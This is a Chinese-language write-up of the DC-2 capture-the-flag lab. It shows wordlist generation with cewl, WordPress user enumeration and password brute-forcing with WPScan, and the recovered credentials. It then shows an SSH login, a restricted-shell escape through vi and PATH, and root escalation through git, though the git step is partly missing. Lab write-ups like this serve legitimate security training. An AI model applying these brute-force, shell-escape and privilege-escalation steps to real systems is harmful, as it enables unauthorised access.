一,工具介紹
(1)cewl密碼生成器
用途
- cewl是一個ruby應用,爬行指定url的指定深度。結果會返回一個單詞列表,這個列進行密碼爆破。
.原理
- 爬取網站上的信息,遍歷目錄。生成一些可能的密碼組合。
.
什麼時候用
- 得到管理員用戶名,嘗試爆破密碼時使用
.
常用選項
-w XXX.txt
寫入到文件
【eg】cewl -w dc2_passwords.txt http://dc-2
(2)WPScan
用途
- WPScan是一個掃描WordPress漏洞的黑盒子掃描器,可以掃描出wordpress的版本,主題,插件,後臺用戶以及爆破後臺用戶密碼等。
.
常用選項
--update
更新漏洞庫--url URL
掃描指定URL(WordPressCMS)的漏洞--enumerate u
掃描wordpress用戶
(3)linux提權思路
1. sudo -l 查看有SUID的命令
2. 使用sudo 命令
3. 利用suid權限的特性提權爲root
二,測試流程
(1)主機發現
nmap掃描
【思路】
針對掃描出的開放服務(應用程序)的處理思路
1. 針對版本搜索相關漏洞
2. 針對協議本身
(2)根據80端口的進一步測試
先寫入
192.168.44.133 dc-2
到hosts文件
WordPress是一種使用PHP語言和MySQL數據庫開發的博客平臺,get CMS
【思路】
☞ 根據CMS做進一步的操作
1. 成熟的CMS一般自身不會有漏洞,可以關注其插件的問題
2. 嘗試得知CMS版本,做進一步的漏洞搜索
3. 搜索相關CMS的測試工具
(3)攻擊準備
提示使用cewl工具
使用方法,使用cewl生成密碼
針對cms使用相關的工具
使用wpscan工具
root@kali:~# wpscan --url http://dc-2 --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.3.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://dc-2/
[+] Started: Sun Sep 15 11:51:38 2019
Interesting Finding(s):
[+] http://dc-2/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 4.7.10 identified.
| Detected By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
[+] Enumerating Users
Brute Forcing Author IDs - Time: 00:00:00 <===========================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Detected By: Rss Generator (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jerry
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Finished: Sun Sep 15 11:51:40 2019
[+] Requests Done: 20
[+] Memory used: 32.027 MB
[+] Elapsed time: 00:00:01
掃描出了三個用戶
結合cewl工具生成的字典文件進行爆破
root@kali:~# wpscan --url http://dc-2/ -U dc-2_user.txt -P dc2_passwords.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.3.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://dc-2/
[+] Started: Sun Sep 15 12:04:47 2019
Interesting Finding(s):
[+] http://dc-2/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.2
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating All Plugins
[i] No plugins Found.
[+] Enumerating Config Backups
Checking Config Backups - Time: 00:00:00 <============================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying admin / next Time: 00:00:30 <=================================> (644 / 644) 100.00% Time: 00:00:30
Trying admin / find Time: 00:00:30 <=================================> (644 / 644) 100.00% Time: 00:00:30
WARNING: Your progress bar is currently at 644 out of 644 and cannot be incremented. In v2.0.0 this will become a ProgressBar::InvalidProgressError.
Trying admin / find Time: 00:00:30 <=================================> (644 / 644) 100.00% Time: 00:00:30
Trying admin / log Time: 00:00:30 <==================================> (644 / 644) 100.00% Time: 00:00:30
WARNING: Your progress bar is currently at 644 out of 644 and cannot be incremented. In v2.0.0 this will become a ProgressBar::InvalidProgressError.
Trying admin / log Time: 00:00:30 <==================================> (644 / 644) 100.00% Time: 00:00:30
[i] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
[+] Finished: Sun Sep 15 12:05:19 2019
[+] Requests Done: 699
[+] Memory used: 111.535 MB
[+] Elapsed time: 00:00:32
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
(4)結合掃描出來的服務,嘗試SSH登錄
root@kali:~# ssh [email protected] -p 7744
The authenticity of host '[192.168.44.133]:7744 ([192.168.44.133]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.44.133]:7744' (ECDSA) to the list of known hosts.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ whoami
-rbash: whoami: command not found
tom@DC-2:~$ cd
-rbash: cd: restricted
嘗試爲tom可以登錄
發現爲受限shell(限制了可執行的命令)
【思路】
SSH後查看是什麼shell
這裏發現是受限制的shell -->嘗試繞過
用vi的
:set shell=/bin/bash
: shell
之後export -p
查看發現PATH變量可以寫入
export PATH=$PATH:/bin/
【過程】
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export -p
declare -x HOME="/home/tom"
declare -x LANG="en_US.UTF-8"
declare -x LC_MEASUREMENT="zh_CN.UTF-8"
declare -x LC_MONETARY="zh_CN.UTF-8"
declare -x LC_NUMERIC="zh_CN.UTF-8"
declare -x LC_PAPER="zh_CN.UTF-8"
declare -x LC_TIME="zh_CN.UTF-8"
declare -x LOGNAME="tom"
declare -x MAIL="/var/mail/tom"
declare -x OLDPWD
declare -x PATH="/home/tom/usr/bin:/bin/" ?加入了/bin
declare -x PWD="/home/tom"
declare -x SHELL="/bin/rbash"
declare -x SHLVL="2"
declare -x SSH_CLIENT="192.168.44.128 54410 7744"
declare -x SSH_CONNECTION="192.168.44.128 54410 192.168.44.133 7744"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm-256color"
declare -x USER="tom"
declare -x VIM="/usr/share/vim"
declare -x VIMRUNTIME="/usr/share/vim/vim74"
添加了環境變量後可以執行的命令就多了啊!
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
tom@DC-2:~$ su jerry
Password:
切換到jerry用戶
jerry@DC-2:/home/tom$ cd /home/jerry/
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
jerry@DC-2:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
提示了用git命令使用SUID提權到root
status Show the working tree status
tag Create, list, delete or verify a tag object signed with GPG
'git help -a' and 'git help -g' lists available subcommands and some
concept guides. See 'git help <command>' or 'git help <concept>'
!/bin/bash
root@DC-2:/home/jerry# cd ~
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
root@DC-2:~#